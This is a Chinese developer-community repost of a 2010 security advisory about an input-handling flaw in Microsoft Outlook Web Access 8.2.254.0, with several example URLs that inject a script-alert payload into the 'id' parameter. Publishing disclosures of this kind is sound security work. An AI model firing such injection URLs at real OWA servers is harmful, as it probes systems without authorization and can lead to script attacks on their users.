备案控制台

开发者社区

开发者社区安全文章正文

Microsoft Outlook Web Access (OWA) version 8.2.254.0 information disclosure vulnerability

2010-05-25 769

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"Microsoft Outlook Web Access (OWA) version 8.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
"Microsoft Outlook Web Access (OWA) version 8.2.254.0"
OS: Windows Server 2003
Internet Explorer 7
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.
Following are different exploitation techniques:
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>
 
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A
 
Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA

// sebug.net [2010-05-25]

文章标签：

Windows

安全

关键词：

web vulnerability

microsoft web

microsoft web version

outlook web access

web information disclosure

cnbird

目录

相关文章

一乐乐

|

5月前

|

应用服务中间件

idea 调试报错 Illegal access: this web application instance has been stopped already.

idea 调试报错 Illegal access: this web application instance has been stopped already.

一乐乐

76 0 0

yuanzhengme

|

4月前

|

应用服务中间件数据安全/隐私保护

Tomcat【部署 02】Web端403 Access Denied You are not authorized to view this page解决方法（Tomcat 10.2.12 版本）

Tomcat【部署 02】Web端403 Access Denied You are not authorized to view this page解决方法（Tomcat 10.2.12 版本）

yuanzhengme

122 0 0

翰文编程

|

6月前

|

开发框架 .NET 数据库

asp.net企业费用报销管理信息系统VS开发sqlserver数据库web结构c#编程Microsoft Visual Studio

asp.net 企业费用报销管理信息系统是一套完善的web设计管理系统，系统具有完整的源代码和数据库，系统主要采用B/S模式开发。开发环境为vs2010，数据库为sqlserver2008，使用c#语言开发应用技术：asp.net c#+sqlserver 开发工具：vs2010 +sqlserver

翰文编程

49 0 0

bboss

|

应用服务中间件数据格式 XML

解决tomcat stop报Illegal access: this web application instance has been stopped异常方法

解决tomcat stop报Illegal access: this web application instance has been stopped异常方法运行shutdown.bat/shutdown.

bboss

5283 0 0

技术工程师

outlook的插件管理(Web界面)

outlook的插件管理(Web界面)

技术工程师

147 0 0

outlook的插件管理(Web界面)

sktj

|

Web App开发安全测试技术

Acunetix Web Vulnerability Scanner手册

目录： 0×00、什么是Acunetix Web Vulnarability Scanner ( What is AWVS?) 0×01、AWVS安装过程、主要文件介绍、界面简介、主要操作区域简介（Install AWVS and GUI Descri...

sktj

3005 0 0

技术小甜

Silverlight Toolkit已经被加入到Microsoft Web Platform Installer中

技术小甜

1036 0 0

技术小大人

|

Web App开发存储数据库

Outlook Web App 访问公用文件夹

技术小大人

1404 0 0

技术小甜

|

存储

在Exchange Server 2007中的Outlook Web Access中尝试向电子邮件附加大文件时可能会收到错误消息

技术小甜

1622 0 0

技术小胖子

|

存储安全

Outlook Web App 客户端超时设置

技术小胖子

1296 0 0

热门文章

最新文章

阿里云安全产品，Web应用防火墙与云防火墙产品各自作用简介

构建高效响应式Web界面：现代前端框架的比较

Serverless 应用引擎常见问题之做的web服务计费如何解决

机器学习PAI常见问题之web ui 项目启动后页面打不开如何解决

在Python Web开发过程中：数据库与缓存，MySQL和NoSQL数据库的主要差异是什么？

组态软件之万维组态介绍（web组态、html组态、vue2/vue3组态）

深入探索 Qt6 web模块 WebEngineCore：从基础原理到高级应用与技巧

Linux系统之部署web-check网站分析工具

使用Selenium执行JavaScript脚本：探索Web自动化的新领域

《理解 WebSocket：Java Web 开发的实时通信技术》

视觉智能平台常见问题之web端编辑器实现如何解决

构建高性能Web应用的关键技术

构建响应式Web界面：Flexbox的力量

探索现代Web应用中的微前端架构

如何在本地安装Flask并将其web界面发布到公网上远程访问协同开发

前端开发新趋势：Web3、区块链和虚拟现实

构建响应式Web界面：Flexbox布局的力量

JAVA Web项目开发SSM框架搭建（第一天）

JAVA Web项目开发创建Web项目（第一天）

JAVA Web项目开发eclipse工具包配置（第一天）

相关课程

更多

Python Web开发基础

Java Web开发系列课程 - Spring框架入门

企业Web常用架构LAMP-LNMP实战

高校精品课-西安交通大学-Web 编程技术

Java Web项目实战 - 图书商城

Java面试疑难点解析 - Java Web开发

相关电子书

更多

Web应用系统性能优化

高性能Web架构之缓存体系

PWA:移动Web的现在与未来

相关实验场景

更多

使用SLB+2ECS+NAS，部署电商web网站的高可用架构

1分钟SAE部署Web在线游戏

云上Web及FTP

WEB网页编程实战

通过部署流行Web框架掌握Serverless技术

手动部署Java Web环境（Alibaba Cloud Linux 2）

下一篇

阿里云oss简介和使用流程